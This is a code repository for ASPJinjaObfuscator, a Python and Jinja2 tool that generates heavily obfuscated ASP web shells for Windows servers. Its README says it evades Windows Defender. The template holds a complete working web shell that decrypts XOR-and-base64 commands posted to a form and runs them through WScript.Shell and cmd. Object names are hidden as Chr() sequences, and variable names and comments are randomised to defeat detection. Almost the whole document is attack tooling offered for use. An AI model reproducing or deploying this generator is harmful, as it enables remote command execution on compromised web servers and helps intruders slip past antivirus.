Repository: fin3ss3g0d/ASPJinjaObfuscator
Branch: main
Commit: 57021a9afcd8
Files: 5
Total size: 15.5 KB
Directory structure:
gitextract_pkpz65n_/
├── LICENSE.md
├── README.md
├── asp-jinja-obfuscator.py
├── requirements.txt
└── shell.py.j2
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE.md
================================================
MIT License
Copyright (c) 2024 Dylan Evans
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
================================================
FILE: README.md
================================================
# ASPJinjaObfuscator
A heavily obfuscated `Windows` based `ASP` web shell generation tool utilizing the power of Python's `Jinja2` templating engine. Generates a web shell with randomized variable/function names and HTML strings of random lengths, XOR encrypted strings with base64 encoding, a random amount of newlines, a random amount of `VBScript/HTML` comments with a random amount of random strings, and a random encryption key per generation. Tested as bypassing the latest version of `Windows Defender` as of `04/22/2024` with `Cloud-delivered protection` enabled.
## Installation
Make sure that you have `Python3` with the `Jinja2` & `pyperclip` `pip` packages installed. Install the `pip` requirements with the following command:
```bash
pip3 install -r requirements.txt
```
## Usage
Run the program with no commandline arguments from the directory where the script and the `Jinja2` template is installed, it will then generate a randomized web shell named `output.asp`. The program will ask you what commands you would like to run, type them into the program in plaintext and it will give you the encrypted versions. It will automatically copy them to the clipboard, paste these encrypted commands into the web shell, it will decrypt and then run them. That's it, time to **PROFIT**!
================================================
FILE: asp-jinja-obfuscator.py
================================================
import random
import string
import base64
import pyperclip
from jinja2 import Environment, FileSystemLoader
def random_string():
length = random.randint(5, 100) # Generate a random length between 5 and 100
return ''.join(random.choice(string.ascii_letters) for _ in range(length))
def xor_encrypt(data, key):
return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))
def encode_base64(data):
return base64.b64encode(data.encode()).decode()
def render_template(template_name, **kwargs):
env = Environment(loader=FileSystemLoader('./'))
template = env.get_template(template_name)
return template.render(**kwargs)
def add_random_newlines(template, max_newlines=5):
"""
Adds random newlines to a given template string at the end of lines to avoid breaking the code.
:param template: str - The original multiline template string.
:param max_newlines: int - The maximum number of newlines to add.
:return: str - The mutated template string with newlines added.
"""
# Split the template into lines
lines = template.splitlines()
# Select random line indices to add newlines after them
newline_positions = sorted(random.sample(range(len(lines)), min(max_newlines, len(lines))))
# Add extra newlines to the selected lines
for index in newline_positions:
lines[index] += '\n' * random.randint(1, 50) # Add between 1 and 50 newlines
# Reassemble the template with the added newlines
return '\n'.join(lines)
def generate_comments(spaces_count, html_format=False):
"""
Generates random comment lines with a specified number of spaces prefixed,
each containing a random number of random strings. The format of the comments
can be either HTML or VBScript based on the html_format flag.
:param spaces_count: int - Number of spaces to prepend to each comment line.
:param html_format: bool - If True, returns HTML formatted comments, else VBScript comments.
:return: str - A string of one or more randomly generated comment lines.
"""
# Random number of comment lines to generate
number_of_comments = random.randint(1, 50)
# Generate the comment block
comment_block = ""
space_prefix = ' ' * spaces_count
for _ in range(number_of_comments):
# Random number of strings to generate per comment line
number_of_strings = random.randint(1, 20)
# Collect multiple random strings
comment_strings = ' '.join(random_string() for _ in range(number_of_strings))
if html_format:
comment_block += f"{space_prefix}\n"
else:
comment_block += f"{space_prefix}' {comment_strings}\n"
return comment_block.strip()
def obfuscate_code(key):
# Find and replace all template variables
to_replace = {
'encryptedInput': random_string(),
'encryptedCommand': random_string(),
'decryptedCommand': random_string(),
'objShell': random_string(),
'objExecObject': random_string(),
'strOutput': random_string(),
'keyString': random_string(),
'tempDecodedString': random_string(),
'encryption_key': key,
'cmd_Decrypted': random_string(),
'WScript_Shell_Decrypted': random_string(),
'Base64Encode': random_string(),
'strText': random_string(),
'objXML': random_string(),
'objNode': random_string(),
'StringToBinary': random_string(),
'MultiByteToBinary': random_string(),
'arrData': random_string(),
'stream': random_string(),
'Base64Decode': random_string(),
'BinaryToString': random_string(),
'binaryVal': random_string(),
'objStream': random_string(),
'XORStrings': random_string(),
'input1': random_string(),
'input2': random_string(),
'char1': random_string(),
'char2': random_string(),
'xorValue': random_string(),
'result': random_string(),
'iterator': random_string(),
'base64DecodedCommand': random_string(),
'cmd': encode_base64(xor_encrypt("cmd /c ", key)),
'WScript_Shell': encode_base64(xor_encrypt("WScript.Shell", key)),
'Execute_Command': random_string(),
'Execute_Encrypted_Command': random_string(),
'Enter_Encrypted_Command': random_string(),
'inputSize': random.randint(5, 250),
'SubmitValue': random_string(),
'vbComment': generate_comments(0),
'vbComment4': generate_comments(4),
'vbComment8': generate_comments(8),
'vbComment12': generate_comments(12),
'htmlComment': generate_comments(0, html_format=True),
'htmlComment4': generate_comments(4, html_format=True),
'htmlComment8': generate_comments(8, html_format=True),
}
# Load the template and render it with the variables
obfuscated_code = render_template('shell.py.j2', **to_replace)
# Add random newlines to the obfuscated code
return add_random_newlines(obfuscated_code, 100)
def main():
key = random_string()
obfuscated_code = obfuscate_code(key)
with open("output.asp", "w") as output_file:
output_file.write(obfuscated_code)
while True:
command = input("Enter command to encrypt: ")
encrypted_command = encode_base64(xor_encrypt(command, key))
print(f"Encrypted: {encrypted_command}")
pyperclip.copy(encrypted_command)
print("Encrypted command copied to clipboard.")
if __name__ == "__main__":
main()
================================================
FILE: requirements.txt
================================================
Jinja2>=3.0
pyperclip>=1.8.2
================================================
FILE: shell.py.j2
================================================
<%
{{ vbComment }}
If Request.Form("{{ encryptedInput }}") <> "" Then
{{ vbComment4 }}
Dim {{ encryptedCommand }}, {{ decryptedCommand }}
{{ vbComment4 }}
Dim {{ objShell }}, {{ objExecObject }}, {{ strOutput }}
{{ vbComment4 }}
Dim {{ keyString }}, {{ tempDecodedString }}
{{ vbComment4 }}
Dim {{ cmd_Decrypted }}, {{ WScript_Shell_Decrypted }}
{{ vbComment4 }}
{{ keyString }} = "{{ encryption_key }}"
{{ vbComment4 }}
{{ tempDecodedString }} = {{ Base64Decode }}("{{ cmd }}")
{{ vbComment4 }}
{{ cmd_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }})
{{ vbComment4 }}
{{ tempDecodedString }} = {{ Base64Decode }}("{{ WScript_Shell }}")
{{ vbComment4 }}
{{ WScript_Shell_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }})
{{ vbComment4 }}
Function {{ Base64Encode }}({{ strText }})
{{ vbComment8 }}
Dim {{ objXML }}, {{ objNode }}
{{ vbComment8 }}
Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116))
{{ vbComment8 }}
Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52))
{{ vbComment8 }}
{{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)
{{ vbComment8 }}
{{ objNode }}.nodeTypedValue = {{ StringToBinary }}({{ strText }})
{{ vbComment8 }}
{{ Base64Encode }} = {{ objNode }}.text
{{ vbComment8 }}
Set {{ objNode }} = Nothing
{{ vbComment8 }}
Set {{ objXML }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ StringToBinary }}({{ strText }})
{{ vbComment8 }}
Dim {{ arrData }}
{{ vbComment8 }}
{{ arrData }} = {{ MultiByteToBinary }}({{ strText }})
{{ vbComment8 }}
{{ StringToBinary }} = {{ arrData }}
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ MultiByteToBinary }}({{ strText }})
{{ vbComment8 }}
Dim {{ stream }}
{{ vbComment8 }}
Set {{ stream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
{{ vbComment8 }}
{{ stream }}.Type = 2
{{ vbComment8 }}
{{ stream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49)
{{ vbComment8 }}
{{ stream }}.Open
{{ vbComment8 }}
{{ stream }}.WriteText {{ strText }}
{{ vbComment8 }}
{{ stream }}.Position = 0
{{ vbComment8 }}
{{ stream }}.Type = 1
{{ vbComment8 }}
{{ MultiByteToBinary }} = {{ stream }}.Read
{{ vbComment8 }}
{{ stream }}.Close
{{ vbComment8 }}
Set {{ stream }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ Base64Decode }}({{ strText }})
{{ vbComment8 }}
Dim {{ objXML }}, {{ objNode }}
{{ vbComment8 }}
Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116))
{{ vbComment8 }}
Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52))
{{ vbComment8 }}
{{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)
{{ vbComment8 }}
{{ objNode }}.text = {{ strText }}
{{ vbComment8 }}
{{ Base64Decode }} = {{ BinaryToString }}({{ objNode }}.nodeTypedValue)
{{ vbComment8 }}
Set {{ objNode }} = Nothing
{{ vbComment8 }}
Set {{ objXML }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ BinaryToString }}({{ binaryVal }})
{{ vbComment8 }}
Dim {{ objStream }}
{{ vbComment8 }}
Set {{ objStream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
{{ vbComment8 }}
{{ objStream }}.Type = 1
{{ vbComment8 }}
{{ objStream }}.Open
{{ vbComment8 }}
{{ objStream }}.Write {{ binaryVal }}
{{ vbComment8 }}
{{ objStream }}.Position = 0
{{ vbComment8 }}
{{ objStream }}.Type = 2
{{ vbComment8 }}
{{ objStream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49)
{{ vbComment8 }}
{{ BinaryToString }} = {{ objStream }}.ReadText
{{ vbComment8 }}
{{ objStream }}.Close
{{ vbComment8 }}
Set {{ objStream }} = Nothing
{{ vbComment8 }}
End Function
{{ vbComment4 }}
Function {{ XORStrings }}({{ input1 }}, {{ input2 }})
{{ vbComment8 }}
Dim {{ result }}
{{ vbComment8 }}
Dim {{ iterator }}
{{ vbComment8 }}
Dim {{ char1 }}, {{ char2 }}, {{ xorValue }}
{{ vbComment8 }}
{{ result }} = ""
{{ vbComment8 }}
For {{ iterator }} = 1 To Len({{ input1 }})
{{ vbComment12 }}
{{ char1 }} = Asc(Mid({{ input1 }}, {{ iterator }}, 1))
{{ vbComment12 }}
{{ char2 }} = Asc(Mid({{ input2 }}, ({{ iterator }} - 1) Mod Len({{ input2 }}) + 1, 1))
{{ vbComment12 }}
{{ xorValue }} = {{ char1 }} Xor {{ char2 }}
{{ vbComment12 }}
{{ result }} = {{ result }} & Chr({{ xorValue }})
{{ vbComment12 }}
Next
{{ vbComment8 }}
{{ XORStrings }} = {{ result }}
{{ vbComment8 }}
End Function
{{ vbComment4 }}
{{ encryptedCommand }} = Request.Form("{{ encryptedInput }}")
{{ vbComment4 }}
{{ base64DecodedCommand }} = {{ Base64Decode }}({{ encryptedCommand }})
{{ vbComment4 }}
{{ decryptedCommand }} = {{ XORStrings }}({{ base64DecodedCommand }}, {{ keyString }})
{{ vbComment4 }}
Set {{ objShell }} = CreateObject({{ WScript_Shell_Decrypted }})
{{ vbComment4 }}
Set {{ objExecObject }} = {{ objShell }}.Exec({{ cmd_Decrypted }} & {{ decryptedCommand }})
{{ vbComment4 }}
{{ strOutput }} = {{ objExecObject }}.StdOut.ReadAll()
{{ vbComment4 }}
Set {{ objExecObject }} = Nothing
{{ vbComment4 }}
Set {{ objShell }} = Nothing
{{ vbComment4 }}
End If
{{ vbComment }}
%>
{{ htmlComment }}
{{ htmlComment }}
{{ Execute_Command }}
{{ htmlComment4 }}
{{ htmlComment }}
{{ htmlComment }}
{{ Execute_Encrypted_Command }}
{{ htmlComment4 }}
{{ htmlComment4 }}
<% If Request.Form("{{ encryptedInput }}") <> "" Then %>
{{ htmlComment8 }}
<%={{ strOutput }}%>
{{ htmlComment8 }}
<% End If %>
{{ htmlComment4 }}
{{ htmlComment }}